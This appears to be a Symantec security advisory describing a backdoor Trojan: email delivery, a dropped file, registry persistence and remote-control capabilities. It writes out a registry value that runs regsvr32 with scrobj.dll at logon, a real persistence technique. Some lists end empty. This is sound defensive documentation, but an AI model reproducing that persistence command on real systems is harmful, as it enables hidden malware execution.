The Trojan may arrive via email containing a malicious attachment.
Once executed, the Trojan creates the following file:
- %AppData%\[RANDOM LETTERS].txt
The Trojan creates the following registry entries:
- HKEY_CURRENT_USER\Software\Microsoft\Notepad\"[USER NAME]" = "[RANDOM DATA]"
- HKEY_CURRENT_USER\Environment\"UserInitMprLogonScript" = "regsvr32.exe /s /n /u /i:"%AppData%\[RANDOM LETTERS].txt" scrobj.dll"
Next, the Trojan checks internet connectivity by connecting to the following remote location:
The Trojan then opens a backdoor on the compromised computer and connects to the following remote locations:
The Trojan may then perform the following actions:
- Download and run executable files
- Download and run scripts
- Run individual commands
- Uninstall and delete itself
Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":